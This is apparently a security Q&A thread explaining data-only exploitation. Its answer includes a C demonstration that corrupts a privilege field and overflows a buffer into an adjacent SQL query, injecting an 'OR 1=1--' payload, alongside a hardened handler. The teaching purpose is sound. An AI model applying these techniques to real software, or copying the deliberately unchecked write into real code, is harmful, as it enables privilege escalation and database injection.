
I was wondering, and after trying to read up on this for the past several months I got totally lost and don't understand this concept. Could someone please explain in simple words the concept of data-only attacks, what their purpose is, and why one would choose this method over others?

Note: I am familiar with other techniques such as the various ret2* techniques, JOP/ROP, ...

Additionally, I would appreciate it if someone knows of a "cheat sheet"/wiki-like site/GitHub repository that shows modern concepts regarding exploitation (not the old stuff that the internet is full of). I am pretty sure it could help a lot of people here as well.

My goal is to help make things more secure and I really want to contribute my part to aid.


1 Answer


Data-only exploitation is the mindset / understanding that:

  1. A lot of effort has been put into anti-exploitation techniques in recent years, making existing exploitation strategies more difficult.
  2. Most of that effort revolves around the prevention of code subversion, i.e., cases where the end goal of the attacker is to control code execution.

Contrary to that, in certain cases, code execution may be merely a means to an end such as extracting personal information from a mobile device, gaining access to a remote server, deleting valued data, or shutting down major infrastructure at just the right moment.

A data-only exploitation approach suggests that instead of manipulating the code execution flow directly (by overwriting code with shellcode, or writing code on the stack and overwriting the stack address) or indirectly (creating a ROP chain, bypassing CFI), an attacker may also modify data in order to achieve a desired outcome.

Examples may make this easier to understand:

  1. In the most basic sense, this means that instead of executing shellcode and spawning a shell, an attacker may use a relative-dword-write primitive to add a new user to the linked list of admin users and then use it to log in to the system.

  2. Similarly, a buffer overflow of some sort may be used to overwrite an SQL query, turning a memory corruption into an SQL injection. Again, this could either insert some sort of desired entry or extract information from an internal database.
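The two examples in the answer above, as an added worked illustration in C (this is not code from the original post or its author; the structs, names, payload bytes and the toy handlers are all constructed for the demonstration). The memory-corruption bug itself is modelled explicitly as a `relative_write()` helper that writes attacker-chosen bytes at an attacker-chosen offset from an object whose layout they know, which is what an unchecked `memcpy` in a real target gives you. Example 1 flips a 4-byte `role` field instead of splicing a node into the list (a simplification of "add a new user to the admin list"); example 2 shows a query that was already quote-escaped being replaced wholesale by an overflow out of the neighbouring `username` field, so the textual SQLi defence is bypassed without ever touching a return address or function pointer. A hardened handler that simply refuses over-long input is shown beside it.

```c
/* Added example (not from the original post): data-only exploitation of two
 * toy services. All structs, names and payloads below are constructed. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Stand-in for the attacker's memory-corruption primitive: write `len`
 * attacker-chosen bytes at an attacker-chosen offset into a known object. */
static void relative_write(void *base, size_t off, const void *src, size_t len)
{
    memcpy((unsigned char *)base + off, src, len);
}

/* ---- Example 1: a privilege field, not a code pointer, is the target ---- */

enum { ROLE_USER = 0, ROLE_ADMIN = 1 };

struct user {
    char         name[16];
    uint32_t     role;   /* the dword the attacker actually wants to change */
    struct user *next;   /* all users live on one list; is_admin() walks it  */
};

static int is_admin(const struct user *head, const char *name)
{
    for (; head; head = head->next)
        if (strcmp(head->name, name) == 0)
            return head->role == ROLE_ADMIN;
    return 0;
}

/* Returns 1 if "eve" is treated as admin after one 4-byte data write. */
int demo_role_flip(void)
{
    struct user eve  = { "eve",  ROLE_USER,  NULL };
    struct user root = { "root", ROLE_ADMIN, &eve };
    int before = is_admin(&root, "eve");                 /* 0 */

    uint32_t admin = ROLE_ADMIN;                          /* the "dword" */
    relative_write(&eve, offsetof(struct user, role), &admin, sizeof admin);

    int after = is_admin(&root, "eve");                  /* 1 */
    return before == 0 && after == 1;
}

/* ---- Example 2: overflow into an already-built query => SQL injection ---- */

struct request {
    char username[32];
    char query[128];     /* laid out directly after username */
};

#define QUERY_FMT "SELECT id FROM users WHERE name='%s'"

/* Classic textual SQLi defence: double every single quote. */
static void escape_into(char *dst, size_t cap, const char *src, size_t len)
{
    size_t o = 0;
    for (size_t i = 0; i < len && o + 2 < cap; i++) {
        if (src[i] == '\'') dst[o++] = '\'';
        dst[o++] = src[i];
    }
    dst[o] = '\0';
}

/* Vulnerable: the query is built from the escaped name first, then the raw
 * name is stored "for logging" with the caller's length, unchecked (the bug).
 * Bytes past 32 land in `query`, replacing the safely escaped statement. */
const char *handle_request_vuln(struct request *r, const char *input, size_t len)
{
    char escaped[2 * sizeof r->username];
    escape_into(escaped, sizeof escaped, input, len);
    snprintf(r->query, sizeof r->query, QUERY_FMT, escaped);
    relative_write(r, offsetof(struct request, username), input, len);
    return r->query;
}

/* Hardened: refuse over-long input instead of writing past the field.
 * (A real fix would also use a parameterised query, not string building.) */
const char *handle_request_safe(struct request *r, const char *input, size_t len)
{
    if (len >= sizeof r->username)
        return NULL;
    memcpy(r->username, input, len);
    r->username[len] = '\0';
    char escaped[2 * sizeof r->username];
    escape_into(escaped, sizeof escaped, input, len);
    snprintf(r->query, sizeof r->query, QUERY_FMT, escaped);
    return r->query;
}

/* Constructed payload: 32 filler bytes, then the replacement query text. */
static const char INJECTED[] = "SELECT id FROM users WHERE name='' OR 1=1--";

static size_t build_payload(char *buf)
{
    size_t n = sizeof(((struct request *)0)->username);
    memset(buf, 'A', n);
    memcpy(buf + n, INJECTED, sizeof INJECTED);          /* includes NUL */
    return n + sizeof INJECTED;
}

int demo_query_overwrite(void)            /* 1: corruption became SQLi */
{
    char payload[256];
    size_t len = build_payload(payload);
    struct request r;
    const char *q = handle_request_vuln(&r, payload, len);
    return q != NULL && strcmp(q, INJECTED) == 0;
}

int demo_query_overwrite_fixed(void)      /* 1: payload rejected, benign ok */
{
    char payload[256];
    size_t len = build_payload(payload);
    struct request r;
    if (handle_request_safe(&r, payload, len) != NULL)
        return 0;
    const char *q = handle_request_safe(&r, "o'brien", 7);
    return q != NULL &&
           strcmp(q, "SELECT id FROM users WHERE name='o''brien'") == 0;
}

int main(void)
{
    printf("role flip succeeded:       %d\n", demo_role_flip());
    printf("query overwrite succeeded: %d\n", demo_query_overwrite());
    printf("hardened handler holds:    %d\n", demo_query_overwrite_fixed());
    return 0;
}
```

Note what CFI, shadow stacks, W^X and similar mitigations would see here: nothing. Every write lands in plain data, and every branch the program takes is one it was compiled to take; only the values it branches on were changed. That is the whole point of the mindset described above.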

  • 1
    Hmm, I had a recent case where I found an mscoree.dll inside of which no code had been manipulated. Instead only the import directory had been manipulated to include another DLL. The effect was that the now statically imported DLL got to subvert the (CLR) process very early on. Would this count as data-only exploitation as well?
    – 0xC0000022L
    Commented Dec 7, 2022 at 8:55
  • @0xC0000022L I'd count the entire DLL as "changing code" (regardless of whether actual assembly instructions are modified), but it's really a semantics question, I think. An interesting one, though, but I don't think one that has a definitive answer.
    – NirIzr
    Commented Dec 7, 2022 at 9:58
  • @0xC0000022L If I may add to your question, JIT makes this even more difficult to define well. Should exploitation that gains code execution by modifying / manipulating JIT compilation code be considered "Data only exploitation"? :D
    – NirIzr
    Commented Dec 7, 2022 at 10:01
